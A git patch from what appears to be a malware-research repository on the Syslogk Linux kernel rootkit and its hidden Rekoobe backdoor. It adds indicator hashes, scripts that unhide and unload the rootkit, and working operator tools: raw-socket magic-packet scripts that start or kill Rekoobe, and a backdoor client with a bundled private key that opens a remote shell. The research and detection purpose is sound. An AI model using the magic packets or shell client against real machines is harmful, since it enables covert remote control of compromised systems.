From 0e673de28789d2e367f22c58b872080eb5945a9d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20=C3=81lvarez?= Date: Mon, 13 Jun 2022 08:48:05 +0200 Subject: [PATCH] Syslogk Rootkit --- SyslogkRootkit/README.md | 91 +++++++++++++++++++ SyslogkRootkit/Research Tools/cert.pem | 48 ++++++++++ .../magic_packet_kill_rekoobe.py | 29 ++++++ .../magic_packet_start_rekoobe.py | 26 ++++++ .../Research Tools/rekoobe_backdoor_client.py | 39 ++++++++ .../remove_syslogk_from_memory.sh | 3 + .../Research Tools/unhide_rootkit.c | 14 +++ SyslogkRootkit/samples.md5 | 71 +++++++++++++++ SyslogkRootkit/samples.sha1 | 71 +++++++++++++++ SyslogkRootkit/samples.sha256 | 71 +++++++++++++++ 10 files changed, 463 insertions(+) create mode 100644 SyslogkRootkit/README.md create mode 100644 SyslogkRootkit/Research Tools/cert.pem create mode 100644 SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py create mode 100644 SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py create mode 100644 SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py create mode 100644 SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh create mode 100644 SyslogkRootkit/Research Tools/unhide_rootkit.c create mode 100644 SyslogkRootkit/samples.md5 create mode 100644 SyslogkRootkit/samples.sha1 create mode 100644 SyslogkRootkit/samples.sha256 diff --git a/SyslogkRootkit/README.md b/SyslogkRootkit/README.md new file mode 100644 index 0000000..a77aca7 --- /dev/null +++ b/SyslogkRootkit/README.md @@ -0,0 +1,91 @@ +# IoC for Syslogk Kernel Rootkit hiding Rekoobe + +### Table of Contents +* [IoCs](#IoCs) +* [Source Code of our research tools](#Source-Code-of-our-research-tools) + +## Samples (SHA-256) +#### IoCs +``` +68FACAC60EE0ADE1AA8F8F2024787244C2584A1A03D10CDA83EEAF1258B371F2 +11EDF80F2918DA818F3862246206B569D5DCEBDC2A7ED791663CA3254EDE772D +FA94282E34901EBA45720C4F89A0C820D32840AE49E53DE8E75B2D6E78326074 +FD92E34675E5B0B8BFBC6B1F3A00A7652E67A162F1EA612F6E86CCA846DF76C5 +12C1B1E48EFFE60EEF7486B3AE3E458DA403CD04C88C88FAB7FCA84D849EE3F5 +06778BDDD457AAFBC93D384F96EAD3EB8476DC1BC8A6FBD0CD7A4D3337DDCE1E +F1A592208723A66FA51CE1BC35CBD6864E24011C6DC3BCD056346428E4E1C55D +55DBDB84C40D9DC8C5AAF83226CA00A3395292CC8F884BDC523A44C2FD431C7B +DF90558A84CFCF80639F32B31AEC187B813DF556E3C155A05AF91DEDFD2D7429 +160CFB90B81F369F5BA929ABA0B3130CB38D3C90D629FE91B31FDEF176752421 +B4D0F0D652F907E4E77A9453DCCE7810B75E1DC5867DEB69BEA1E4ECDD02D877 +3A6F339DF95E138A436A4FEFF64DF312975A262FA16B75117521B7D6E7115D65 +74699B0964A2CBDC2BC2D9CA0B2B6F5828B638DE7C73B1D41E7FE26CFC2F3441 +7A599FF4A58CB0672A1B5E912A57FCDC4B0E2445EC9BC653F7F3E7A7D1DC627F +F4E3CFEEB4E10F61049A88527321AF8C77D95349CAF616E86D7FF4F5BA203E5F +31330C0409337592E9DE7AC981CECB7F37CE0235F96E459FEFBD585E35C11A1A +C6D735B7A4656A52F3CD1D24265E4F2A91652F1A775877129B322114C9547DEB +2E81517EE4172C43A2084BE1D584841704B3F602CAFC2365DE3BCB3D899E4FB8 +B22F55E476209ADB43929077BE83481EBDA7E804D117D77266B186665E4B1845 +A93B9333A203E7EED197D0603E78413013BD5D8132109BBEF5EF93B36B83957C +870D6C202FCC72088FF5D8E71CC0990777A7621851DF10BA74D0E07D19174887 +CA2EE3F30E1C997CC9D8E8F13EC94134CDB378C4EB03232F5ED1DF74C0A0A1F0 +9D2E25EC0208A55FBA97AC70B23D3D3753E9B906B4546D1B14D8C92F8D8EB03D +29058D4CEE84565335EAFDF2D4A239AFC0A73F1B89D3C2149346A4C6F10F3962 +7E0B340815351DAB035B28B16CA66A2C1C7EAF22EDF9EAD73D2276FE7D92BAB4 +AF9A19F99E0DCD82A31E0C8FC68E89D104EF2039B7288A203F6D2E4F63AE4D5C +6F27DE574AD79EB24D93BEB00E29496D8CFE22529FC8EE5010A820F3865336A9 +D690D471B513C5D40CAEF9F1E37C94DB20E6492B34EA6A3CDDCC22058F842CF3 +E08E241D6823EFEDF81D141CC8FD5587E13DF08AEDA9E1793F754871521DA226 +DA641F86F81F6333F2730795DE93AD2A25AB279A527B8B9E9122B934A730AB08 +E3D64A128E9267640F8FC3E6BA5399F75F6F0ACA6A8DB48BF989FE67A7EE1A71 +D3E2E002574FB810AC5E456F122C30F232C5899534019D28E0E6822E426ED9D3 +7B88FA41D6A03AEDA120627D3363B739A30FE00008CE8D848C2CBB5B4473D8BC +50B73742726B0B7E00856E288E758412C74371EA2F0EAF75B957D73DFB396FD7 +8B036E5E96AB980DF3DCA44390D6F447D4CA662A7EDDAC9F52D172EFFF4C58F8 +8B18C1336770FCDDC6FE78D9220386BCE565F98CC8ADA5A90CE69CE3DDF36043 +F04DC3C62B305CDB4D83D8DF2CAA2D37FEEB0A86FB5A745DF416BAC62A3B9731 +72F200E3444BB4E81E58112111482E8175610DC45C6E0C6DCD1D2251BACF7897 +D129481955F24430247D6CC4AF975E4571B5AF7C16E36814371575BE07E72299 +6FC03C92DEE363DD88E50E89062DD8A22FE88998AFF7DE723594EC916C348D0A +FCA2EA3E471A0D612CE50ABC8738085F076AD022F70F78C3F8C83D1B2FF7896B +2FEA3BC88C8142FA299A4AD9169F8879FC76726C71E4B3E06A04D568086D3470 +178B23E7EDED2A671FA396DD0BAC5D790BCA77EC4B2CF4B464D76509ED12C51A +3BFF2C5BFC24FC99D925126EC6BEB95D395A85BC736A395AAF4719C301CBBFD4 +14A33415E95D104CF5CF1ACAFF9586F78F7EC3FFB26EFD0683C468EDEAF98FD7 +8BB7842991AFE86B97DEF19F226CB7E0A9F9527A75981F5E24A70444A7299809 +020A6B7EDCFF7764F2AAC1860142775EDEF1BC057BEDD49B575477105267FC67 +6711D5D42B54E2D261BB48AA7997FA9191AEC059FD081C6F6E496D8DB17A372A +48671BC6DBC786940EDE3A83CC18C2D124D595A47FB20BC40D47EC9D5E8B85DC +B0D69E260A44054999BAA348748CF4B2D1EAAB3DD3385BB6AD5931FF47A920DE +E1999A3E5A611312E16BB65BB5A880DFEDBAB8D4D2C0A5D3ED1ED926A3F63E94 +FA0EA232AB160A652FCBD8D6DB8FFA09FD64BCB3228F000434D6A8E340AAF4CB +11EDF80F2918DA818F3862246206B569D5DCEBDC2A7ED791663CA3254EDE772D +73BBABC65F884F89653A156E432788B5541A169036D364C2D769F6053960351F +8EC87DEE13DE3281D55F7D1D3B48115A0F5E4A41BFBEF1EA08E496AC529829C8 +8285EE3115E8C71C24CA3BDCE313D3CFADEAD283C31A116180D4C2611EFB610D +958BCE41371B68706FEAE0F929A18FA84D4A8A199262C2110A7C1C12D2B1DCE2 +38F357C32F2C5A5E56EA40592E339BAC3B0CABD6A903072B9D35093A2ED1CB75 +BCC3D47940AE280C63B229D21C50D25128B2A15EA42FE8572026F88F32ED0628 +08A1273AC9D6476E9A9B356B261FDC17352401065E2FC2AD3739E3F82E68705A +CF525918CB648C81543D9603AC75BC63332627D0EC070C355A86E3595986CBB3 +42BC744B22173FF12477E57F85FA58450933E1C4294023334B54373F6F63EE42 +337674D6349C21D3C66A4245C82CB454FEA1C4E9C9D6E3578634804793E3A6D6 +4EFFA5035FE6BBAFD283FFAE544A5E4353EB568770421738B4B0BB835DAD573B +5B8059EA30C8665D2C36DA024A170B31689C4671374B5B9B1A93C7CA47477448 +BD07A4CCC8FA67E2E80B9C308DEC140CA1AE9C027FA03F2828E4B5BDBA6C7391 +BF09A1A7896E05B18C033D2D62F70EA4CAC85E2D72DBD8869E12B61571C0327E +79916343B93A5A7AC7B7133A26B77B8D7D0471B3204EAE78A8E8091BFE19DC8C +C32E559568D2F6960BC41CA0560AC8F459947E170339811804011802D2F87D69 +864C261555FCE40D022A68D0B0EADB7AB69DA6AF52AF081FD1D9E3ECED4AEE46 +275D63587F3AC511D7CCA5FF85AF2914E74D8B68EDD5A7A8A1609426D5B7F6A9 +031183E9450AD8283486621C4CDC556E1025127971C15053A3BF202C132FE8F9 +``` +## Source Code of our research tools +``` +unhide_rootkit.c +remove_syslogk_from_memory.sh +magic_packet_start_rekoobe.py +magic_packet_kill_rekoobe.py +rekoobe_backdoor_client.py +cert.pem +``` diff --git a/SyslogkRootkit/Research Tools/cert.pem b/SyslogkRootkit/Research Tools/cert.pem new file mode 100644 index 0000000..08a8745 --- /dev/null +++ b/SyslogkRootkit/Research Tools/cert.pem @@ -0,0 +1,48 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEogIBAAKCAQEAtlnqZJNnTEKf2rx6scEqc2vCnGjOJO/Os2gEJTwvLym9SWSM +NZ2GTNOKmKsuF8AIbzWnOujglzmbyJjN28iyt2IUkTHEJIrb7ka2EnxnRP9uhA7Q +OPl0BI7wi2kmZNrXshKXYnWNWikdRuVMv4J6WFqjx8GDq9NVBwZpqF4OqZzEUcT4 +yTmVaf9v2Ll2JUnhP3VXiv35ng0UT7rMqlB73qQalPjmmcQLOzGrdbJXadLePZzp +0BX5MVVW4vPxXxhZpdZCT6J6CxPUN589//IMm3cHPZ0xVcbheDmJG9FTNPXxhOc/ +wBEGzmNTzLcjiwRkuzSx7gQsDCvUC/+Lc/nFxwIDAQABAoIBAB24xiWiiQG7Ekca +1XzHmV26wLuxsXf/xlcjqxlOl/o9+WZPBzNt+4fmKv77V8XzPOyzeBB4CLNdZnDp +xxP9wHN3fxazX9786yAJUn/s2wA6Cg9oQrQmpKxhh/+RIfrqWKHjud0IgAOkE+uM +UFgeskZYb72NYyLMjV1ZxDr3KbinWDqVUS7R/7QdsJH4c+rs9ML+l/2LOgJp8XBN +3LM9XEuX/conJBWm+cszHwB+QtacIrgKd/RPIfcOBTXsm3dl1Ai0aXCG8dmarFaa +iziIpz9CvuvqMfs0Gbyqjgff45F2oxHuv0SO9SLcgw/iExfoELodydUoqffl+WRN +CSFvXHECgYEA3iHHdv+qXJYJgIi/wotNi7T1+r00WkCGAtDxLWA25mIlCbddLck8 +zp/Q37Z49Pt96O5xVzsSPjQIhUkOXb26IlGNpddRZbWCcHAiG0YpagiFfAuqlqYG +9bds9rfpSG6iSb8d1cF3YFNJKAyX/z3MtF0jwJbJ0tfBWCpzDHdALQ0CgYEA0idr +5d07FyExNYojpNqHJm0JC4JpJd5eFz22wuA3+7+X0Ce8Qu7X3sDvJXu094YVFQkR +BNTI6ZLw+fXhhGNcsinzJYfKDGmXMNiH+OdqyozzysiqCf83rZ204I47Q4pocdYi +upVWjdk/UcAYKxu5kSjyOFoXhgHBEIJAZSQc0SMCgYA+6TA1yqj0OeYNCi3NKmjW +9XRpBCcMnJOXvpdfs4046Hj27ICuU/0tw+ODSImvUH7TdpyRCQDcrx3uqccw02gh +Chnk6zt5Y9PChm+Sa+eUyT8M57zzl6gG9WEd6u5d/j9mRYNso7Nsi4n/lrmBp34P +YwWaKNqWJVbz4mndEPUTDQKBgFkSLlAp2T6vacz4dK0NlhS6SAghyPEs85JELO8h +23iPNwgZn1h7JPGbsoCfkw8KPGtDAXybt2AQUKSRC3lyJ7q3vv+cMw3ZvyQL0m2z +n/ajkTzUmgVMr8udOSmn/wRcaHI/QU71ts6+UnESyuuSf68/vJIX1TqOCcc2fZag +nLojAoGAJdKPzWeIpV86OhMAHY4cU7wKVs25dHtzT067z/Jh6Of2BQG1Q6qUd5mb +JBwXFjWEECMXf9aaVdx+TLIuAE0dvYBTUHRPE+BomKVRx0+heESDeX0Y3H3rb3Xg +SqRTtAdcSLNrZIw1MPQF+VeOLjI0BiuRS0aqsIn+7hqqvG42mUA= +-----END RSA PRIVATE KEY----- +-----BEGIN CERTIFICATE----- +MIIDZTCCAk0CFGea+DeQMw739YWJuj8NI38FvCzLMA0GCSqGSIb3DQEBCwUAMG8x +CzAJBgNVBAYTAkFVMQ0wCwYDVQQIDARuYW1lMQ0wCwYDVQQHDARjaXR5MSEwHwYD +VQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxEDAOBgNVBAsMB3NlY3Rpb24x +DTALBgNVBAMMBG5hbWUwHhcNMTgxMTE5MTg0OTA2WhcNMTkxMTE5MTg0OTA2WjBv +MQswCQYDVQQGEwJBVTENMAsGA1UECAwEbmFtZTENMAsGA1UEBwwEY2l0eTEhMB8G +A1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMRAwDgYDVQQLDAdzZWN0aW9u +MQ0wCwYDVQQDDARuYW1lMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA +tlnqZJNnTEKf2rx6scEqc2vCnGjOJO/Os2gEJTwvLym9SWSMNZ2GTNOKmKsuF8AI +bzWnOujglzmbyJjN28iyt2IUkTHEJIrb7ka2EnxnRP9uhA7QOPl0BI7wi2kmZNrX +shKXYnWNWikdRuVMv4J6WFqjx8GDq9NVBwZpqF4OqZzEUcT4yTmVaf9v2Ll2JUnh +P3VXiv35ng0UT7rMqlB73qQalPjmmcQLOzGrdbJXadLePZzp0BX5MVVW4vPxXxhZ +pdZCT6J6CxPUN589//IMm3cHPZ0xVcbheDmJG9FTNPXxhOc/wBEGzmNTzLcjiwRk +uzSx7gQsDCvUC/+Lc/nFxwIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQCPHTnCCOzh +dkc19fLU327wAYvoRi6T73Ik3wxI+A2U6ATo8qY6dZEvynmhBxhkhYahrfYRYYYB +1fbbYqKYfBR1Hcr/Q4q0J/wyCwG7ZejvkgFHILUEBb9is7obBudAryZDBpRyNK6a +k8aotUnH4bDlyLC6lUQlapzihr3WE5mGzjnVIH2YCN4ooyshkQi6wGvHJ2QudQBB +2qwN6dJbZbtj8j9tFPCojKGQlW8wnLxRoim2188z+DTW6Wb+I3/bWI12uP9YhQ7L +kBHt495ClCqUsrVSUjcgttazGWvcM2ms/UrUoNdbhKsDzx1rvpDdb5sz6170Zg7z +7ikRaS9ULzzm +-----END CERTIFICATE----- diff --git a/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py b/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py new file mode 100644 index 0000000..161fc7e --- /dev/null +++ b/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +"""Syslogk magic packet for killing Rekoobe + (it requires knowing the key 'D9sd87JMaij' and also matching some fields + of the magic packet used for starting Rekoobe) +""" + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) +s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) + +ip_header = b'\x45\x00\xB3\xF7' # Version, IHL, Type of Service | Total Length +ip_header += b'\xb6\xe7\x00\x00' # Identification | Flags, Fragment Offset +ip_header += b'\x40\x06\xa6\xec' # TTL, Protocol | Header Checksum +ip_header += b'\x0a\x00\x02\x0E' # Source Address +ip_header += b'\x0a\x00\x02\x0F' # Destination Address + +tcp_header = b'\xF7\xA9\x00\x00' # Source Port | Destination Port +tcp_header += b'\x00\x00\x00\x00' # Sequence Number +tcp_header += b'\x00\x00\x00\x00' # Acknowledgement Number +tcp_header += b'\x50\x08\x71\x10' # Data Offset, Reserved, Flags | Window Size +tcp_header += b'\xe6\x32\x00\x00' # Checksum | Urgent Pointer + +data = b"jiaMJ78ds9D"[::-1] + +packet = ip_header + tcp_header + data +s.sendto(packet, ('10.0.2.15', 1)) diff --git a/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py b/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py new file mode 100644 index 0000000..30313b8 --- /dev/null +++ b/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +"""Syslogk magic packet for starting Rekoobe + (it first kills all running instances of Rekoobe) +""" + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) +s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) + +ip_header = b'\x45\x00\xB3\xF7' # Version, IHL, Type of Service | Total Length +ip_header += b'\xb6\xe7\x00\x00' # Identification | Flags, Fragment Offset +ip_header += b'\x40\x06\xa6\xec' # TTL, Protocol | Header Checksum +ip_header += b'\x0a\x00\x02\x0E' # Source Address +ip_header += b'\x0a\x00\x02\x0F' # Destination Address + +tcp_header = b'\xB6\xE7\x00\x00' # Source Port | Destination Port +tcp_header += b'\x00\x00\x00\x00' # Sequence Number +tcp_header += b'\x00\x00\x00\x00' # Acknowledgement Number +tcp_header += b'\x50\x02\x71\x10' # Data Offset, Reserved, Flags | Window Size +tcp_header += b'\xe6\x32\x00\x00' # Checksum | Urgent Pointer + +packet = ip_header + tcp_header +s.sendto(packet, ('10.0.2.15', 1)) diff --git a/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py b/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py new file mode 100644 index 0000000..06d07d8 --- /dev/null +++ b/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +"""Rekoobe backdoor client +""" + +import socket +import ssl + +HOST = "127.0.0.1" +PORT = 45681 +client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + +if __name__ == "__main__": + client.connect((HOST, PORT)) + print(client.recv(200)) + client.send("\r\n") + print(client.recv(200)) + client.send("starttls\r\n") + print(client.recv(200)) + ssl_client = ssl.wrap_socket(client, certfile="./cert.pem") + ssl_client.send(b"\x03") + ssl_client.send(b"%") + ssl_client.send(b"0002") + ssl_client.send(b"\r\n") + ssl_client.settimeout(1) + ssl_client.recv() + while True: + command = raw_input("Shell>") + command += "\r\n" + command = command.encode() + ssl_client.send(command) + try: + # Receiving stdin, stdout, stderr + while True: + print(ssl_client.recv()) + except ssl.SSLError: + pass diff --git a/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh b/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh new file mode 100644 index 0000000..cdc25a5 --- /dev/null +++ b/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh @@ -0,0 +1,3 @@ +#!/bin/bash +echo 1>/proc/syslogk +rmmod syslogk diff --git a/SyslogkRootkit/Research Tools/unhide_rootkit.c b/SyslogkRootkit/Research Tools/unhide_rootkit.c new file mode 100644 index 0000000..d1ad6db --- /dev/null +++ b/SyslogkRootkit/Research Tools/unhide_rootkit.c @@ -0,0 +1,14 @@ +// It unhides the Syslog Rootkit +#include +#include +#include +#include +#include + +void main(void) +{ + int fd = open("/proc/syslogk", O_WRONLY); + lseek(fd, 0 , SEEK_SET); + write(fd, "1", 1); // Command for unhiding the module + close(fd); +} \ No newline at end of file diff --git a/SyslogkRootkit/samples.md5 b/SyslogkRootkit/samples.md5 new file mode 100644 index 0000000..8ea1b61 --- /dev/null +++ b/SyslogkRootkit/samples.md5 @@ -0,0 +1,71 @@ +43d49693658a2ee2f1a31f780a2a8994 +358b58523b59d87f2831011f9e441362 +1eb9864a6d939dd7b882ac801165ac18 +f38fb09982cf301df17709b3adc085c2 +a874271e10b9c094f72fca6566d947fe +69fc4610667464b37edb750cde2f5783 +5f2e72ff741c4544f66fec16101aeaf0 +75f9dd103dd05ca263af33c46f3f808d +b1b1c04eba3668713a8c09b2d2178ace +0a35e06f53c17ab1c8e18e7e0c0821d8 +1130c613a858b07234bf93663f5341eb +24b411d2407527c7a58317c6758dca09 +1594d98385fe1682363c7ff2e9e8eba2 +e6bad14fff4f94705a2d8a628799025d +a0dfa397428321fbd689464053c05da0 +e1cff1d865dd4a59d1245ebcec5f6768 +bf71b7b65a2b505a5c54855bcc8dd0ba +35743db3dc333245ef5b69100721ced9 +81627048b6aea0c94256a1aaf8da617d +eec8680ebb6926b75829acec93bb484d +fda1948b62267383471adf0bb5fdb733 +95833f73123a94f01243339c21e62903 +ab811a9e4cc9fe3dfddff5f6635b599b +0086f56a8e688586f5404dae991228e8 +b5cc891b885d9175da892a2ef932fdfc +cb093453576184d1a2f59063dafa7f80 +22402bb153e035a7c94cea13d46e2e11 +d35657a79c7e0d3ab1fe589f5e8088a1 +c06dd1fe1944e4ddfca52c61d27f5f95 +0cda4f097a9b072f4dd8bf3ac6cf273a +1ab35838f3e9bb899d385c6554883243 +791dd369c4acf8603a05de1e1dc53e64 +70334968d03654eb1c274eed997c0c3d +edf7237aa215ce189647a0e231555df0 +22d3bac34718c93966c43390ac7e180d +dd550a0210d9dd4062af1cd8b4acf218 +9122641b443f1fb82518e28c1c23cace +d9f00f71efabdfcca7c63d4b0805673c +1a6b53d9c8d093e5a6c988839fa7b4a0 +6a57986bfcc309556c4ca4168dbe86f2 +68cc213e17cf9acb84460085b1b7514d +97db3f7676380f0baa3840ed5d5c1767 +d38ab3af331c2ce3d2df3a20e4d549ef +bbca59926c8639a0cf8469cbed8303e8 +d8e9f6bf6c0c5bcd5de9f338da3c76a9 +1d37c331d8c67291ce56e0f4c45604b8 +64b26d72396de5892fd4ceca6b32511b +6d91b9aa0139498dc99f50c3529c4468 +4235eba1cfd789d8d66ee782db848fed +a131408c6be036fa3e94585dca7fddf1 +95cffe67742da99a7dc35ffc9fbde026 +901a242517aa71c0768500f81f9a3ad3 +85accdf83bd768a765fc4d0ca8c6105e +d1fb3820d0911e155a330189dbb754ed +c4a9d1873454347ad26921cdd83d9870 +32d8f6ee0c9e5971b0fb6bef53e91d75 +de79f0a71a56161c3405445a25e2c825 +635497c5fd2c58db380ad689d9084ff5 +5e59d6f7442b7d979dbba9dbbe565efc +d75ecc784b27c06d3d56c28f6560ec41 +355358a22b6f1d9e122c2ff830b2849b +492386efefa9ff716b6f0fe4ff46d796 +4640805c362b1e5bee5312514dd0ab2b +97fca49a88af844cfecbb99ae692b4a8 +8dc647c9bc7d9594dee48092e9ee5f64 +ae8ecedb8fcebf7fc48c8fea8f63180e +c4b4cb5395a1ee59a00536a0b17a7c28 +7c30c520bb000220e60e2a6dbec20356 +fecc8bbfbb379d271a2fefbecb7788d1 +14329d09c4ae1156b61ff683127ee1c9 +cabb1200867e788e21ab6966c3914d05 \ No newline at end of file diff --git a/SyslogkRootkit/samples.sha1 b/SyslogkRootkit/samples.sha1 new file mode 100644 index 0000000..7501265 --- /dev/null +++ b/SyslogkRootkit/samples.sha1 @@ -0,0 +1,71 @@ +fe0441fa2c511a80a5d50330204126ae5739af49 +bb53fdf418635beab2112412ed0b1bed6d40f0d4 +9e3112b859954bcbe6a4e32e1a1eee3fb491df54 +ef07da968cdfed7b1e9745a360536bf9d3a9dde8 +2c014fdc8a3298fe073ef95f14ca594c85c70006 +60024cf6fa9adeb384e56367a3a7a7514788d806 +f733802a106f1a2a4249f1605522cdd436110109 +7a8cc29b82415463ea025436e643115fc1ee4147 +98dcd7ac8cc2cbfefd644d5decb34e7002cf1323 +14fd16e6465b74c5ac4dc895f4c15bccb447af31 +b0f74062405a161453621cb1ce4daa6ca09db960 +f85e3ef06c8b5cf8805a4df2560338f007cf3dd7 +61efc60e94cd630f181e8a0f895933cf52c92916 +d4b855b2c9db3fdb34182d00b9a0a455086b8e50 +872f08ee076ddda7d172f9d96f61d1d68662b036 +0bcf6a9ed93c45c2865f3961079d207479be611a +a443b0f3561d4bd8e40b5daed3f6915a5e03e6c2 +fa681933eccc1b3cae4cce6ab6f16db08c2f2a87 +3e2b3ab9e85f4a15a03f59ac4b288119658b24b6 +bb37e133d6901659c4b61a53082a3e6c83ff180a +1ae878306e1732402d949e2ce91ab7b0bdf9f5b9 +55aa4d1541d8a76471a7e06083389a3547ec0472 +cbe804bc2ce4a20281d33f1af5d99931e2162ff7 +cb93c60496e3862afbd1647ceee19ce970aea88f +ab7df4d4b0734a7c30997940af3b54debb1006ae +2f19ff48fd8ff94557d44c7417ec10069cd158e9 +bfeb14b982fa9a01f01fd2e03be4ca5e92849040 +394624cfe12d4d58a91c691b154b61206eb19f1f +f52f35b8cc98b7fa1a19c6cc8371ccd163a7c624 +d3c4bd3ba3775af039bd30e47ca43ff6ca285297 +f909794ab799ea535e96611a12ed8cb872584390 +0cae8afef7e715019ef969b83bc1e4d3a2d531c7 +2e470d8b81fdea77d79af68519509aa136edf67e +80ba296be9ba1f945500bd468026157fad4f7fb8 +11315b4e597672362212a4bbccbb504e41e6c349 +95495c01db77576c1fb14a96efa7fe2132f3ae7f +7b190757efdd470fca4127948c6297d53adf3958 +49c4aa2812535884bd9d3a564e7656dec150933a +9b2c0690e12a27433e0307af22588213dffe639a +d76a1fe4733ab0453ae95abecb82f252da449f83 +33c35312b2b57686da695ed0b2a63bb14d28e2be +4fe8efef8c2e7cc3bafee19da8b223daae2242a1 +afa7e2753f78322467b8ac6bcdcb3b7f33c9864f +88233293c1d0d64e05d29ae5f006ff8094006374 +732e62bec281943aa49fe679bf9f676ad0e36b8b +e050ae9bbb0029d4c6045661f4b3ae829bd74c39 +b0ee6f6e202fa708ab4fcae61f8bd4d236ee7d95 +c01aa4e298aad696b52dae8e498505aa099208a5 +95494d0ce800f2973dc9397c4e7d14762c90404c +ec15bcb9a62cdac24637ad90439d1c6227eaff25 +7f261bffdc4822b471a3719a91dfbf61098cfe4b +165f63816292da06299863cf7643d5798dd30e95 +cddd58e820acbbc3d3237c7a8bec665255c90a38 +ecda0bdc7f34871787215929bcf500bef8be099d +fd2143c6088044176647e44bd8acf909eb3fed0f +01f004d40305c194a1063d47c46bb3787ab84a1d +7c9290587d0954dfa6b19fb4ae3b7bfe30d046b2 +28457abeb8af2b882f226397ed4e383b6f74fbb4 +752e5c2ed95cc518582c069cf0b9ad477899463a +8d4f1d20c0b55c4c22971837482b0b8a5e93480a +b19c1696b032805014f9cc289caf45e346936583 +845160c24a9177eaf02f5800bc5876508b3b8960 +f743a235ebed3f1757074acbef2f0c8b2d3f833a +53abaef53d6b87e16df254b5d2a7886ba4af0be9 +00af7dcd02ebe1ea97dde77df7ef90cecd6e33db +6cf5541546dff30bdb8c5203766ec0826d70d214 +6256a050210bf8075eebf1c3ebdea36ea22bcd13 +b818ecefd6dc92e51a6ba232bfa562b5c4c2c31c +275ae290639984f11f43da603acc7faa7deaa564 +63e717d1caa3d0a4436ade9b263a0622dcdb8838 +63588250c49b06aaecc854fe59b17b3f9b5bfeff \ No newline at end of file diff --git a/SyslogkRootkit/samples.sha256 b/SyslogkRootkit/samples.sha256 new file mode 100644 index 0000000..7b3793d --- /dev/null +++ b/SyslogkRootkit/samples.sha256 @@ -0,0 +1,71 @@ +020a6b7edcff7764f2aac1860142775edef1bc057bedd49b575477105267fc67 +031183e9450ad8283486621c4cdc556e1025127971c15053a3bf202c132fe8f9 +06778bddd457aafbc93d384f96ead3eb8476dc1bc8a6fbd0cd7a4d3337ddce1e +08a1273ac9d6476e9a9b356b261fdc17352401065e2fc2ad3739e3f82e68705a +11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d +12c1b1e48effe60eef7486b3ae3e458da403cd04c88c88fab7fca84d849ee3f5 +14a33415e95d104cf5cf1acaff9586f78f7ec3ffb26efd0683c468edeaf98fd7 +160cfb90b81f369f5ba929aba0b3130cb38d3c90d629fe91b31fdef176752421 +178b23e7eded2a671fa396dd0bac5d790bca77ec4b2cf4b464d76509ed12c51a +275d63587f3ac511d7cca5ff85af2914e74d8b68edd5a7a8a1609426d5b7f6a9 +29058d4cee84565335eafdf2d4a239afc0a73f1b89d3c2149346a4c6f10f3962 +2e81517ee4172c43a2084be1d584841704b3f602cafc2365de3bcb3d899e4fb8 +2fea3bc88c8142fa299a4ad9169f8879fc76726c71e4b3e06a04d568086d3470 +31330c0409337592e9de7ac981cecb7f37ce0235f96e459fefbd585e35c11a1a +337674d6349c21d3c66a4245c82cb454fea1c4e9c9d6e3578634804793e3a6d6 +38f357c32f2c5a5e56ea40592e339bac3b0cabd6a903072b9d35093a2ed1cb75 +3a6f339df95e138a436a4feff64df312975a262fa16b75117521b7d6e7115d65 +3bff2c5bfc24fc99d925126ec6beb95d395a85bc736a395aaf4719c301cbbfd4 +42bc744b22173ff12477e57f85fa58450933e1c4294023334b54373f6f63ee42 +48671bc6dbc786940ede3a83cc18c2d124d595a47fb20bc40d47ec9d5e8b85dc +4effa5035fe6bbafd283ffae544a5e4353eb568770421738b4b0bb835dad573b +50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7 +55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b +5b8059ea30c8665d2c36da024a170b31689c4671374b5b9b1a93c7ca47477448 +6711d5d42b54e2d261bb48aa7997fa9191aec059fd081c6f6e496d8db17a372a +68facac60ee0ade1aa8f8f2024787244c2584a1a03d10cda83eeaf1258b371f2 +6f27de574ad79eb24d93beb00e29496d8cfe22529fc8ee5010a820f3865336a9 +6fc03c92dee363dd88e50e89062dd8a22fe88998aff7de723594ec916c348d0a +72f200e3444bb4e81e58112111482e8175610dc45c6e0c6dcd1d2251bacf7897 +73bbabc65f884f89653a156e432788b5541a169036d364c2d769f6053960351f +74699b0964a2cbdc2bc2d9ca0b2b6f5828b638de7c73b1d41e7fe26cfc2f3441 +79916343b93a5a7ac7b7133a26b77b8d7d0471b3204eae78a8e8091bfe19dc8c 